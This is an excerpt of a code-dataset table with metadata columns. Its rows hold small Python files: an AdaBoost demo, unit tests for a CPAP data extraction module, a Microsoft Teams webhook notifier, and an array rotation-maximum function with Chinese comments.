max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
chapter7/7_7_1.py | kungbob/Machine_Learning_In_Action | 0 | 6623851 | <reponame>kungbob/Machine_Learning_In_Action
import adaboost
datArr, labelArr = adaboost.loadDataSet('horseColicTraining2.txt')
classifierArray, aggClassEst = adaboost.adaBoostTrainDS(datArr, labelArr, 10)
adaboost.plotROC(aggClassEst.T, labelArr)
| import adaboost
datArr, labelArr = adaboost.loadDataSet('horseColicTraining2.txt')
classifierArray, aggClassEst = adaboost.adaBoostTrainDS(datArr, labelArr, 10)
adaboost.plotROC(aggClassEst.T, labelArr) | none | 1 | 2.121266 | 2 | |
test_cpap_extraction.py | cdvandyke/CPAP-extraction | 1 | 6623852 | <gh_stars>1-10
'''
This module contains unittests for the cpap_extraction module
'''
import unittest # For testing
import os # For file I/O
import io # For reading strings as files
from mock import Mock # For mocking input and output files
from mock import patch # For patching out file I/O
import cpap_extraction # The module to be tested
import py_config
from datetime import datetime
class TestOpenFile(unittest.TestCase):
'''
Tests the open_file method, which reads in a binary file, and returns it
as a file object.
Methods
-------
testReadFileExists
Tests whether open_file correctly opens a file that exists
testReadFileDoesNotExist
Tests whether open_file correctly raises the FileNotFoundError
exception if the specified file does not exist
'''
@patch('cpap_extraction.open')
@patch('cpap_extraction.os.path.isfile', return_value=True)
def test_open_file_exists(self, mocked_os, mocked_file):
with self.assertRaises(TypeError):
cpap_extraction.open_file('Any file')
mocked_file.assert_called_once_with('Any file', 'rb')
@patch('cpap_extraction.open')
@patch('cpap_extraction.os.path.isfile', return_value=False)
def test_open_file_does_not_exist(self, mocked_os, mocked_file):
# Use a context manager to test raising exceptions:
# https://docs.python.org/3.6/library/unittest.html
with self.assertRaises(FileNotFoundError):
cpap_extraction.open_file('Any file')
class TestSetupArgs(unittest.TestCase):
def test_normal(self):
cpap_extraction.sys.argv = [ "cpap_extraction.py", "inputfile.001"]
input, output_path = cpap_extraction.setup_args()
self.assertEqual(input, "inputfile.001")
self.assertEqual(output_path, ".")
def test_bad_argument(self):
"""
This test puts extra stuff in the output
"""
if False:
cpap_extraction.sys.argv = [ "cpap_extraction.py", "inputfile", "extrastuff"]
with self.assertRaises(SystemExit):
cpap_extraction.setup_args()
def test_flags(self):
cpap_extraction.CONFIG = py_config.config()
cpap_extraction.sys.argv = [ "cpap_extraction.py", "-v", "-d", "inputfile.001", "--destination=output"]
input, output_path = cpap_extraction.setup_args()
self.assertEqual(input, "inputfile.001")
self.assertEqual(output_path, "output")
self.assertTrue(cpap_extraction.CONFIG["Verbose"])
self.assertTrue(cpap_extraction.CONFIG["Debug"])
class TestReadPacket(unittest.TestCase):
'''
Tests the read_packet method, which takes two arguments, data_file and
delimiter. data_file is a file, created by the read_file method, that
contains multiple packets, each separated by delimiter. This method
returns the first complete packet it finds within data file, or it returns
nothing if no packet is found. read_packet leaves the seak point of
data_file at the beginning of the next packet.
These tests use Python's io class:
https://docs.python.org/3/library/io.html
Methods
-------
testNormal
Tests whether read_file performs as expected in a base case
testEmpty
Tests that read_file properly returns an empty BytesArray if
data_file is empty
testDataFileEndsNoDelimeter
Tests whether read_file properly returns a packet that did not end
with a delimiter. In this scenario, a warning should be raised
testEmptyDelimeter
Tests whether read_file properly returns the entire packet,
unmodified if delimiter = b''
testInvalidDelimeter
Tests whether read_file properly raises a ValueError if delimiter
is not of type bytes
'''
def test_normal(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'\x34\x32')
def test_empty(self):
data_file = io.BytesIO(b'')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'')
def test_data_file_ends_no_delimiter(self):
data_file = io.BytesIO(b'\x34\x32')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'\x34\x32')
def test_empty_delimiter(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = b''
with self.assertRaises(ValueError):
packet = cpap_extraction.read_packet(data_file, delimiter)
def test_invalid_delimiter(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = 'test'
with self.assertRaises(TypeError):
packet = cpap_extraction.read_packet(data_file, delimiter)
class TestSplitPackets(unittest.TestCase):
'''
Tests the split_packets method, which should simply call the split_packet
method for each packet in a data file.
Methods
-------
testNormal
Tests a data_file containing two packets, separated by a
delimiter of \xff\xff\xff\xff. Ensures that split_packets returns
an array of size 2, and that the first index of the array contains
the first packet, and the second index of the array contains the
second packet
Notes
------
Other cases that may seem necessary to test, such as if the delimiter is
invalid, the data file does not contain the delimiter, the data file is
empty, etc. are tested in testReadPacket
'''
def test_normal(self):
data_file = io.BytesIO(b'\x03\x0c\x01\x00\xff\xff\xff\xff\x45')
delimiter = b'\xff\xff\xff\xff'
packets = cpap_extraction.split_packets(data_file, delimiter)
self.assertEqual(len(packets), 2)
self.assertEqual(packets[0], b'\x03\x0c\x01\x00')
self.assertEqual(packets[1], b'\x45')
class TestExtractPacket(unittest.TestCase):
'''
Tests the extract_packet method, which takes two arguments, a packet of
bytes, and a dictionary {field name: c_type}, where field name is the name
of the packet's various fields, and c_type is the field's corresponding
c_type, which determines how many bytes that field should be.
'''
def test_normal(self):
fields = {'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L',
'Test unsigned long long': 'Q'}
input_file = bytearray(b'''\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09''')
correct_output = {'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
'Test unsigned long long': 666666666666666666}
extracted_packet = cpap_extraction.extract_packet(input_file, fields)
self.assertEqual(extracted_packet, correct_output)
class TestDataFromPackets(unittest.TestCase):
def test_standard(self):
packets = [bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09'),
bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00'),
bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a')
]
fields = [{'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L',
'Test unsigned long long': 'Q'},
{'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L'}]
correct_output = [{'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
'Test unsigned long long': 666666666666666666
},
{ 'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
}]
output = cpap_extraction.data_from_packets(packets, fields)
self.assertEqual(output, correct_output)
class TestApplyDateandTime(unittest.TestCase):
"""
This tests applying the date and time to a dictionary.
As well as correctly addressing the packet type
"""
def test_type_0_3(self):
expected_output = {'type': 0, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551441255), 'no entries': 207, 'field 2': 1, 'subtype': 3}
input = {'type': 0, 'time 1': 1551428926000, 'time 2': 1551441255000, 'no entries': 207, 'field 2': 1}
output = cpap_extraction.apply_type_and_time(68, input)
self.assertEqual(output, expected_output)
def test_first_packet(self):
input = {'Data type': 4440, 'U1': 0, 'no packets': 1}
expected_output = {'Data type': 4440, 'U1': 0, 'no packets': 1, 'type':1, 'subtype':1}
output = cpap_extraction.apply_type_and_time(67, input)
self.assertEqual(output, expected_output)
def test_type_0_4(self):
expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551428926), 'subtype': 4}
input = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 1551428926000, 'time 2': 1551428926000}
output = cpap_extraction.apply_type_and_time(68, input)
self.assertEqual(output, expected_output)
def test_type_1(self):
expected_output = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1), 'time 2': datetime.utcfromtimestamp(2), 'subtype': 1}
input = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 1000, 'time 2': 2000}
output = cpap_extraction.apply_type_and_time(84, input)
self.assertEqual(output, expected_output)
def test_type_0_0(self):
expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1, 'subtype': 0 }
input = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
output = cpap_extraction.apply_type_and_time(62, input)
self.assertEqual(output, expected_output)
def test_no_change(self):
input = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
inputf = input.copy()
output = cpap_extraction.apply_type_and_time(-1, inputf)
self.assertDictEqual(output, input)
class TestFieldOfLength(unittest.TestCase):
'''
Tests the "fields_of_length" method
'''
def test_type_error(self):
with self.assertRaises(TypeError):
cpap_extraction.field_of_length(25, {'Just a dictionary not a list': 'e'})
with self.assertRaises(TypeError):
cpap_extraction.field_of_length("nope", [{'somedata': 'Q'}])
with self.assertRaises(TypeError):
cpap_extraction.field_of_length(25, ['Not a dictioary'])
def test_key_error(self):
with self.assertRaises(KeyError):
cpap_extraction.field_of_length(25, [{"only 8": 'Q'}])
def test_value_error(self):
with self.assertRaises(ValueError):
cpap_extraction.field_of_length(25, [{"invalid c type": 'nope'}])
def test_normal(self):
eight = {"8": 'q'}
four = {"4": 'i'}
sixteen = {"8": 'q', "another 8": 'Q'}
dicts = [eight, four, sixteen]
self.assertEqual(cpap_extraction.field_of_length(4,dicts), four)
class TestTwosCompliment(unittest.TestCase):
'''
Tests twos compliment function
'''
def testPosNeg(self):
self.assertEqual(cpap_extraction.twos(42),-22)
class TestExtractionSystem(unittest.TestCase):
"""
This is designed a wholistic system test.
"""
def read_results_file(self, filename):
results = []
with open(filename, 'r') as rfile:
text = rfile.read()
lines = text.split('\n')
for line in lines:
expected = line.strip()
if expected != "":
if expected[0] != '#':
results.append(expected)
return results
def test_file_one(self):
test001File = "TestFiles/test_one.001"
results = self.read_results_file("TestFiles/test_one_result.txt")
dataDict = cpap_extraction.extract_file(test001File)
dataFile = cpap_extraction.open_file(test001File)
header = cpap_extraction.extract_header(dataFile)
headerstr = str(header).strip()
self.assertEqual(headerstr, results.pop(0))
for packet in dataDict["packet_data"]:
self.assertEqual(str(packet).strip(), results.pop(0))
self.assertTrue(results.pop(0) in str(dataDict["data"][5]["data_vals"]))
self.assertTrue(results.pop(0) in str(dataDict["raw"]["Respitory Rate"]["Values"]))
self.assertTrue(len(results) == 0)
class TestCSVExport(unittest.TestCase):
"""
Tests the CSV export method
"""
def test_type_error(self):
data = {
"1": "0",
"2": "0",
"3": "2",
"4": "5",
"5": "5",
"6": "2",
}
Times = [1,2,3,4,5,6]
header = {"Start time": datetime.utcfromtimestamp(1551428926)}
with self.assertRaises(TypeError):
cpap_extraction.data_to_csv(data, ".", header)
def test_missing_value(self):
Times = ["1_1","2_2","3_3","4_4","5_5","6_6"]
Values = [0,0,2,5,5]
data = {"Test": {"Times" : Times, "Values" : Values}}
header = {"Start time": datetime.utcfromtimestamp(1551428926)}
with self.assertRaises(TypeError):
cpap_extraction.data_to_csv(data, ".", header)
if __name__ == '__main__':
unittest.main()
| '''
This module contains unittests for the cpap_extraction module
'''
import unittest # For testing
import os # For file I/O
import io # For reading strings as files
from mock import Mock # For mocking input and output files
from mock import patch # For patching out file I/O
import cpap_extraction # The module to be tested
import py_config
from datetime import datetime
class TestOpenFile(unittest.TestCase):
'''
Tests the open_file method, which reads in a binary file, and returns it
as a file object.
Methods
-------
testReadFileExists
Tests whether open_file correctly opens a file that exists
testReadFileDoesNotExist
Tests whether open_file correctly raises the FileNotFoundError
exception if the specified file does not exist
'''
@patch('cpap_extraction.open')
@patch('cpap_extraction.os.path.isfile', return_value=True)
def test_open_file_exists(self, mocked_os, mocked_file):
with self.assertRaises(TypeError):
cpap_extraction.open_file('Any file')
mocked_file.assert_called_once_with('Any file', 'rb')
@patch('cpap_extraction.open')
@patch('cpap_extraction.os.path.isfile', return_value=False)
def test_open_file_does_not_exist(self, mocked_os, mocked_file):
# Use a context manager to test raising exceptions:
# https://docs.python.org/3.6/library/unittest.html
with self.assertRaises(FileNotFoundError):
cpap_extraction.open_file('Any file')
class TestSetupArgs(unittest.TestCase):
def test_normal(self):
cpap_extraction.sys.argv = [ "cpap_extraction.py", "inputfile.001"]
input, output_path = cpap_extraction.setup_args()
self.assertEqual(input, "inputfile.001")
self.assertEqual(output_path, ".")
def test_bad_argument(self):
"""
This test puts extra stuff in the output
"""
if False:
cpap_extraction.sys.argv = [ "cpap_extraction.py", "inputfile", "extrastuff"]
with self.assertRaises(SystemExit):
cpap_extraction.setup_args()
def test_flags(self):
cpap_extraction.CONFIG = py_config.config()
cpap_extraction.sys.argv = [ "cpap_extraction.py", "-v", "-d", "inputfile.001", "--destination=output"]
input, output_path = cpap_extraction.setup_args()
self.assertEqual(input, "inputfile.001")
self.assertEqual(output_path, "output")
self.assertTrue(cpap_extraction.CONFIG["Verbose"])
self.assertTrue(cpap_extraction.CONFIG["Debug"])
class TestReadPacket(unittest.TestCase):
'''
Tests the read_packet method, which takes two arguments, data_file and
delimiter. data_file is a file, created by the read_file method, that
contains multiple packets, each separated by delimiter. This method
returns the first complete packet it finds within data file, or it returns
nothing if no packet is found. read_packet leaves the seak point of
data_file at the beginning of the next packet.
These tests use Python's io class:
https://docs.python.org/3/library/io.html
Methods
-------
testNormal
Tests whether read_file performs as expected in a base case
testEmpty
Tests that read_file properly returns an empty BytesArray if
data_file is empty
testDataFileEndsNoDelimeter
Tests whether read_file properly returns a packet that did not end
with a delimiter. In this scenario, a warning should be raised
testEmptyDelimeter
Tests whether read_file properly returns the entire packet,
unmodified if delimiter = b''
testInvalidDelimeter
Tests whether read_file properly raises a ValueError if delimiter
is not of type bytes
'''
def test_normal(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'\x34\x32')
def test_empty(self):
data_file = io.BytesIO(b'')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'')
def test_data_file_ends_no_delimiter(self):
data_file = io.BytesIO(b'\x34\x32')
delimiter = b'\xff\xff\xff\xff'
packet = cpap_extraction.read_packet(data_file, delimiter)
self.assertEqual(packet, b'\x34\x32')
def test_empty_delimiter(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = b''
with self.assertRaises(ValueError):
packet = cpap_extraction.read_packet(data_file, delimiter)
def test_invalid_delimiter(self):
data_file = io.BytesIO(b'\x34\x32\xff\xff\xff\xff\x42')
delimiter = 'test'
with self.assertRaises(TypeError):
packet = cpap_extraction.read_packet(data_file, delimiter)
class TestSplitPackets(unittest.TestCase):
'''
Tests the split_packets method, which should simply call the split_packet
method for each packet in a data file.
Methods
-------
testNormal
Tests a data_file containing two packets, separated by a
delimiter of \xff\xff\xff\xff. Ensures that split_packets returns
an array of size 2, and that the first index of the array contains
the first packet, and the second index of the array contains the
second packet
Notes
------
Other cases that may seem necessary to test, such as if the delimiter is
invalid, the data file does not contain the delimiter, the data file is
empty, etc. are tested in testReadPacket
'''
def test_normal(self):
data_file = io.BytesIO(b'\x03\x0c\x01\x00\xff\xff\xff\xff\x45')
delimiter = b'\xff\xff\xff\xff'
packets = cpap_extraction.split_packets(data_file, delimiter)
self.assertEqual(len(packets), 2)
self.assertEqual(packets[0], b'\x03\x0c\x01\x00')
self.assertEqual(packets[1], b'\x45')
class TestExtractPacket(unittest.TestCase):
'''
Tests the extract_packet method, which takes two arguments, a packet of
bytes, and a dictionary {field name: c_type}, where field name is the name
of the packet's various fields, and c_type is the field's corresponding
c_type, which determines how many bytes that field should be.
'''
def test_normal(self):
fields = {'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L',
'Test unsigned long long': 'Q'}
input_file = bytearray(b'''\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09''')
correct_output = {'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
'Test unsigned long long': 666666666666666666}
extracted_packet = cpap_extraction.extract_packet(input_file, fields)
self.assertEqual(extracted_packet, correct_output)
class TestDataFromPackets(unittest.TestCase):
def test_standard(self):
packets = [bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09'),
bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00'),
bytearray(b'\x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a')
]
fields = [{'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L',
'Test unsigned long long': 'Q'},
{'Test unsigned short': 'H',
'Test unsigned int': 'I',
'Test unsigned long': 'L'}]
correct_output = [{'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
'Test unsigned long long': 666666666666666666
},
{ 'Test unsigned short': 42,
'Test unsigned int': 451,
'Test unsigned long': 13371337,
}]
output = cpap_extraction.data_from_packets(packets, fields)
self.assertEqual(output, correct_output)
class TestApplyDateandTime(unittest.TestCase):
"""
This tests applying the date and time to a dictionary.
As well as correctly addressing the packet type
"""
def test_type_0_3(self):
expected_output = {'type': 0, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551441255), 'no entries': 207, 'field 2': 1, 'subtype': 3}
input = {'type': 0, 'time 1': 1551428926000, 'time 2': 1551441255000, 'no entries': 207, 'field 2': 1}
output = cpap_extraction.apply_type_and_time(68, input)
self.assertEqual(output, expected_output)
def test_first_packet(self):
input = {'Data type': 4440, 'U1': 0, 'no packets': 1}
expected_output = {'Data type': 4440, 'U1': 0, 'no packets': 1, 'type':1, 'subtype':1}
output = cpap_extraction.apply_type_and_time(67, input)
self.assertEqual(output, expected_output)
def test_type_0_4(self):
expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1551428926), 'time 2': datetime.utcfromtimestamp(1551428926), 'subtype': 4}
input = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 1551428926000, 'time 2': 1551428926000}
output = cpap_extraction.apply_type_and_time(68, input)
self.assertEqual(output, expected_output)
def test_type_1(self):
expected_output = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': datetime.utcfromtimestamp(1), 'time 2': datetime.utcfromtimestamp(2), 'subtype': 1}
input = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 1000, 'time 2': 2000}
output = cpap_extraction.apply_type_and_time(84, input)
self.assertEqual(output, expected_output)
def test_type_0_0(self):
expected_output = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1, 'subtype': 0 }
input = {'type': 0, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
output = cpap_extraction.apply_type_and_time(62, input)
self.assertEqual(output, expected_output)
def test_no_change(self):
input = {'type': 1, 'Data type': 4377, 'no packets': 1, 'time 1': 0, 'time 2': 0, 'no entries': 207, 'field 2': 1}
inputf = input.copy()
output = cpap_extraction.apply_type_and_time(-1, inputf)
self.assertDictEqual(output, input)
class TestFieldOfLength(unittest.TestCase):
'''
Tests the "fields_of_length" method
'''
def test_type_error(self):
with self.assertRaises(TypeError):
cpap_extraction.field_of_length(25, {'Just a dictionary not a list': 'e'})
with self.assertRaises(TypeError):
cpap_extraction.field_of_length("nope", [{'somedata': 'Q'}])
with self.assertRaises(TypeError):
cpap_extraction.field_of_length(25, ['Not a dictioary'])
def test_key_error(self):
with self.assertRaises(KeyError):
cpap_extraction.field_of_length(25, [{"only 8": 'Q'}])
def test_value_error(self):
with self.assertRaises(ValueError):
cpap_extraction.field_of_length(25, [{"invalid c type": 'nope'}])
def test_normal(self):
eight = {"8": 'q'}
four = {"4": 'i'}
sixteen = {"8": 'q', "another 8": 'Q'}
dicts = [eight, four, sixteen]
self.assertEqual(cpap_extraction.field_of_length(4,dicts), four)
class TestTwosCompliment(unittest.TestCase):
'''
Tests twos compliment function
'''
def testPosNeg(self):
self.assertEqual(cpap_extraction.twos(42),-22)
class TestExtractionSystem(unittest.TestCase):
"""
This is designed a wholistic system test.
"""
def read_results_file(self, filename):
results = []
with open(filename, 'r') as rfile:
text = rfile.read()
lines = text.split('\n')
for line in lines:
expected = line.strip()
if expected != "":
if expected[0] != '#':
results.append(expected)
return results
def test_file_one(self):
test001File = "TestFiles/test_one.001"
results = self.read_results_file("TestFiles/test_one_result.txt")
dataDict = cpap_extraction.extract_file(test001File)
dataFile = cpap_extraction.open_file(test001File)
header = cpap_extraction.extract_header(dataFile)
headerstr = str(header).strip()
self.assertEqual(headerstr, results.pop(0))
for packet in dataDict["packet_data"]:
self.assertEqual(str(packet).strip(), results.pop(0))
self.assertTrue(results.pop(0) in str(dataDict["data"][5]["data_vals"]))
self.assertTrue(results.pop(0) in str(dataDict["raw"]["Respitory Rate"]["Values"]))
self.assertTrue(len(results) == 0)
class TestCSVExport(unittest.TestCase):
"""
Tests the CSV export method
"""
def test_type_error(self):
data = {
"1": "0",
"2": "0",
"3": "2",
"4": "5",
"5": "5",
"6": "2",
}
Times = [1,2,3,4,5,6]
header = {"Start time": datetime.utcfromtimestamp(1551428926)}
with self.assertRaises(TypeError):
cpap_extraction.data_to_csv(data, ".", header)
def test_missing_value(self):
Times = ["1_1","2_2","3_3","4_4","5_5","6_6"]
Values = [0,0,2,5,5]
data = {"Test": {"Times" : Times, "Values" : Values}}
header = {"Start time": datetime.utcfromtimestamp(1551428926)}
with self.assertRaises(TypeError):
cpap_extraction.data_to_csv(data, ".", header)
if __name__ == '__main__':
unittest.main() | en | 0.807065 | This module contains unittests for the cpap_extraction module # For testing # For file I/O # For reading strings as files # For mocking input and output files # For patching out file I/O # The module to be tested Tests the open_file method, which reads in a binary file, and returns it as a file object. Methods ------- testReadFileExists Tests whether open_file correctly opens a file that exists testReadFileDoesNotExist Tests whether open_file correctly raises the FileNotFoundError exception if the specified file does not exist # Use a context manager to test raising exceptions: # https://docs.python.org/3.6/library/unittest.html This test puts extra stuff in the output Tests the read_packet method, which takes two arguments, data_file and delimiter. data_file is a file, created by the read_file method, that contains multiple packets, each separated by delimiter. This method returns the first complete packet it finds within data file, or it returns nothing if no packet is found. read_packet leaves the seak point of data_file at the beginning of the next packet. These tests use Python's io class: https://docs.python.org/3/library/io.html Methods ------- testNormal Tests whether read_file performs as expected in a base case testEmpty Tests that read_file properly returns an empty BytesArray if data_file is empty testDataFileEndsNoDelimeter Tests whether read_file properly returns a packet that did not end with a delimiter. In this scenario, a warning should be raised testEmptyDelimeter Tests whether read_file properly returns the entire packet, unmodified if delimiter = b'' testInvalidDelimeter Tests whether read_file properly raises a ValueError if delimiter is not of type bytes Tests the split_packets method, which should simply call the split_packet method for each packet in a data file. Methods ------- testNormal Tests a data_file containing two packets, separated by a delimiter of \xff\xff\xff\xff. Ensures that split_packets returns an array of size 2, and that the first index of the array contains the first packet, and the second index of the array contains the second packet Notes ------ Other cases that may seem necessary to test, such as if the delimiter is invalid, the data file does not contain the delimiter, the data file is empty, etc. are tested in testReadPacket Tests the extract_packet method, which takes two arguments, a packet of bytes, and a dictionary {field name: c_type}, where field name is the name of the packet's various fields, and c_type is the field's corresponding c_type, which determines how many bytes that field should be. \x2a\x00\xc3\x01\x00\x00\xc9\x07\xcc\x00\xaa\xaa\x42\x1a\xcd\x79\x40\x09 This tests applying the date and time to a dictionary. As well as correctly addressing the packet type Tests the "fields_of_length" method Tests twos compliment function This is designed a wholistic system test. Tests the CSV export method | 3.100686 | 3 |
src/TeamsNotifier.py | BouyguesTelecom/docker-notifier | 0 | 6623853 | <filename>src/TeamsNotifier.py<gh_stars>0
import os
import sys
import pymsteams
class TeamsNotifier:
def notification_type(self):
return "Teams"
def send(self, title, message):
if os.environ.get("WEBHOOK_URL") is None:
print("WEBHOOK_URL environment variable is not set")
sys.exit(1)
if os.environ.get("HTTPS_PROXY") is not None:
myTeamsMessage = pymsteams.connectorcard(os.environ.get("WEBHOOK_URL"), http_proxy=os.environ.get("HTTP_PROXY"), https_proxy=os.environ.get("HTTPS_PROXY"))
else:
myTeamsMessage = pymsteams.connectorcard(os.environ.get("WEBHOOK_URL"))
if title is not None:
myTeamsMessage.title(title)
if os.environ.get("MESSAGE_COLOR") is not None:
myTeamsMessage.color(os.environ.get("MESSAGE_COLOR"))
myTeamsMessage.text(message)
myTeamsMessage.send()
| <filename>src/TeamsNotifier.py<gh_stars>0
import os
import sys
import pymsteams
class TeamsNotifier:
def notification_type(self):
return "Teams"
def send(self, title, message):
if os.environ.get("WEBHOOK_URL") is None:
print("WEBHOOK_URL environment variable is not set")
sys.exit(1)
if os.environ.get("HTTPS_PROXY") is not None:
myTeamsMessage = pymsteams.connectorcard(os.environ.get("WEBHOOK_URL"), http_proxy=os.environ.get("HTTP_PROXY"), https_proxy=os.environ.get("HTTPS_PROXY"))
else:
myTeamsMessage = pymsteams.connectorcard(os.environ.get("WEBHOOK_URL"))
if title is not None:
myTeamsMessage.title(title)
if os.environ.get("MESSAGE_COLOR") is not None:
myTeamsMessage.color(os.environ.get("MESSAGE_COLOR"))
myTeamsMessage.text(message)
myTeamsMessage.send()
| none | 1 | 2.538694 | 3 | |
ezbeq/apis/__init__.py | bmiller/ezbeq | 6 | 6623854 | <filename>ezbeq/apis/__init__.py
import logging
logger = logging.getLogger('ezbeq.apis')
| <filename>ezbeq/apis/__init__.py
import logging
logger = logging.getLogger('ezbeq.apis')
| none | 1 | 1.230872 | 1 | |
src/zodbbrowser/__main__.py | mgedmin/zodbbrowser | 15 | 6623855 |
if __name__ == '__main__':
# support python -m zodbbrowser on Python 2.7
from zodbbrowser.standalone import main
main()
|
if __name__ == '__main__':
# support python -m zodbbrowser on Python 2.7
from zodbbrowser.standalone import main
main()
| en | 0.427643 | # support python -m zodbbrowser on Python 2.7 | 1.12848 | 1 |
O(n) on array/rotate_max.py | boristown/leetcode | 1 | 6623856 | def rotate_max_F(L):
'''
计算将序列L向右旋转k(0<=k<n-1)后,函数F的最大值
F(k) = 0 * Lk[0] + 1 * Lk[1] + ... + (n - 1) * Lk[n - 1]
时间复杂度:O(n)
'''
#分析:
#F(0) = 0 * L[0] + 1 * L[1] + ... + (n - 1) * L[n - 1]
#F(1) = 0 * L[n - 1] + 1 * L[0] + ... + (n - 1) + L[n - 2]
#F(2) = 0 * L[n - 2] + 1 * L[n - 1] + ... + (n - 1) + L[n - 3]
#做差:
#F(1) - F(0) = L[0] + L[1] + …… + L[n-2] - (n-1) * L[n-1] = sum(L) - L[n-1] * n
#F(2) - F(1) = L[0] + L[1] + …… + L[n-3] - (n-1) * L[n-2] + L[n-1] = sum(L) - L[n-2] * n
#F(3) - F(2) = sum(L) - L[n-3]*n
#F(k) - F(k-1) = sum(L) - L[n-k]*n
#过程:
#1 计算n
n = len(L)
#2 计算sum(L)
sumL = sum(L)
#3 计算F(0)
f = 0
for i in range(n):
f += L[i]*i
#4 计算F(1)到F(n-1)并统计最大值
ans = f
for k in range(1,n):
f += sumL - L[n-k]*n
ans = max(ans,f)
#5 输出最大值
return ans | def rotate_max_F(L):
'''
计算将序列L向右旋转k(0<=k<n-1)后,函数F的最大值
F(k) = 0 * Lk[0] + 1 * Lk[1] + ... + (n - 1) * Lk[n - 1]
时间复杂度:O(n)
'''
#分析:
#F(0) = 0 * L[0] + 1 * L[1] + ... + (n - 1) * L[n - 1]
#F(1) = 0 * L[n - 1] + 1 * L[0] + ... + (n - 1) + L[n - 2]
#F(2) = 0 * L[n - 2] + 1 * L[n - 1] + ... + (n - 1) + L[n - 3]
#做差:
#F(1) - F(0) = L[0] + L[1] + …… + L[n-2] - (n-1) * L[n-1] = sum(L) - L[n-1] * n
#F(2) - F(1) = L[0] + L[1] + …… + L[n-3] - (n-1) * L[n-2] + L[n-1] = sum(L) - L[n-2] * n
#F(3) - F(2) = sum(L) - L[n-3]*n
#F(k) - F(k-1) = sum(L) - L[n-k]*n
#过程:
#1 计算n
n = len(L)
#2 计算sum(L)
sumL = sum(L)
#3 计算F(0)
f = 0
for i in range(n):
f += L[i]*i
#4 计算F(1)到F(n-1)并统计最大值
ans = f
for k in range(1,n):
f += sumL - L[n-k]*n
ans = max(ans,f)
#5 输出最大值
